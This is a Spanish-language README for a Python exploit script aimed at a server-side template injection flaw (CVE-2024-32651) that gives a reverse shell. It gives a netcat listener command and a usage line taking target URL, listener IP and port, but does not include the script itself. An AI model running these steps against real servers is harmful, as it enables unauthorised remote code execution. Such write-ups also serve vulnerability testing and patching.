
Exploit de inyección de plantillas del lado del servidor
Exploit de Inyección de Plantillas del Lado del Servidor!!
Ejecución Remota de Código mediante Inyección de Plantillas del Lado del Servidor (SSTI) en una Aplicación Web Vulnerable
Este exploit tiene como objetivo una aplicación web vulnerable a la Inyección de Plantillas del Lado del Servidor (SSTI). Al explotar esta vulnerabilidad, un atacante puede ejecutar comandos arbitrarios en el servidor. El script de Python proporcionado automatiza el proceso de explotación mediante el envío de un payload que desencadena una reverse shell.
Para reproducir la vulnerabilidad, ejecute el script de Python proporcionado contra la aplicación web vulnerable. Asegúrese de tener un listener (por ejemplo, nc -lvp 9999) en ejecución para capturar la conexión de reverse shell.
Guarde el script en un archivo llamado CVE-2024-32651.py.
Instale las bibliotecas de Python necesarias si aún no están instaladas:
pip install requests beautifulsoup4
Para usar el script, proporcione los siguientes argumentos de línea de comandos:
--url: URL base de la aplicación web vulnerable (p. ej., http://10.10.10.10:5000).--port: Puerto del listener (p. ej., 9999).--ip: Dirección IP del listener (p. ej., 10.10.50.22).--notification: (Opcional) URL de notificación si desea usar una URL de notificación específica.python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
Esta versión corregida del exploit se basó en un exploit original publicado por Zach Crosman (zcrosman) con EDB-ID: 52027. Puede ver el exploit original aquí. Agradezco a Zach Crosman su contribución a la comunidad de seguridad.